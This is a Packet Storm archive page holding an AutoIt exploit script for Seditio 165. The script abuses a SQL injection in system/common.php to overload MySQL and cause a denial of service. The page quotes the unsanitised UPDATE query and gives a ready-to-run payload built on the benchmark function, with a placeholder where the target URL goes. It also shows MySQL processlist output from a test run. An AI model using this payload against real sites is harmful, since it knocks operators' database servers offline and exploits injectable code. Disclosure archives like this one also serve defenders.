exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Seditio 165 SQL Injection / Denial Of Service

Seditio 165 SQL Injection / Denial Of Service
Posted Apr 15, 2012
Authored by Akastep

Seditio version 165 suffers from a remote SQL injection vulnerability that can cause a denial of service condition.

tags | exploit, remote, denial of service, sql injection
SHA-256 | 0ecddd84f6f2b1bfd4af0d4f383bec0702b6e6f09e70bbf849427b33b550fedd

Seditio 165 SQL Injection / Denial Of Service

Change Mirror Download
#cs
Seditio 165 (from seditio-eklenti.com)
Denial Of Service exploit by AkaStep.
We will exploit Sql injection using this exploit and as result we will cause Denial of Service.
Mysql server will go down or will overloaded +server will get overloaded(High CPU Load).
// Vuln Discovered By AkaStep + exploit By AkaStep.
Enjoyyyyy)
NOTES Do not login to target site otherwise it will fail to exploit vuln.
Exploit Coded in Autoit.See autoitscript.com


Details about Vuln:(Magic_Quotes_gpc=off)

//seditio165 from seditio-eklenti.com
//magic_quotes_gpc =off
//system/common.php
// 0day by AkaStep

//Vulnerable code section
if (($rd_loc != "users.php")&&($rd_loc != "message.php"))
{

$sql_update_online = sed_sql_query("UPDATE sed_redirecter SET rd_location='".$rd_loc.$rd_extra."',rd_lastseen='".time()."' WHERE rd_ip='".$_SERVER["REMOTE_ADDR"]."'");
}
/14 April 2012

#ce


$targetsite="http://targetsite.tld/"; //target site. Change it to target site.




#cs
DO NOT TOUCH ANYTHING BELOW


#ce

$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit.
$first=$targetsite & '/forums.php'; // our 1'st request will go here.

HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun
InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit.
Sleep(1500); //sleeping 1.5 second (*Waiting operation*)
HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun.
InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service.
Exit; //exit from exploit

#cs

Here is how this process looks like from server's mysql:
worker.com is my own locally spoofed "site" it is not real site anymore.And it is nothing does in this case.

mysql> show full processlist \G
*************************** 4. row ***************************
Id: 5
User: sed165
Host: worker.com:1632
db: sed165
Command: Query
Time: 411
State: Updating
Info: UPDATE sed_redirecter SET rd_location='plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))
),rd_ip='192.168.0.1',rd_lastseen='',rd_lastseen='1334411851' WHERE rd_ip='192.168.0.1'
*************************** 5. row ***************************
Id: 6
User: root
Host: localhost:2658
db: sed165
Command: Query
Time: 0
State: NULL
Info: show full processlist
*************************** 6. row ***************************
Id: 7
User: sed165
Host: worker.com:1633
db: sed165
Command: Query
Time: 69
State: Waiting for table level lock
Info: UPDATE sed_redirecter SET rd_location='forums.php',rd_lastseen='1334412192' WHERE rd_ip='192.168.0.1'
6 rows in set (0.00 sec)

mysql>

+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^



#ce



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close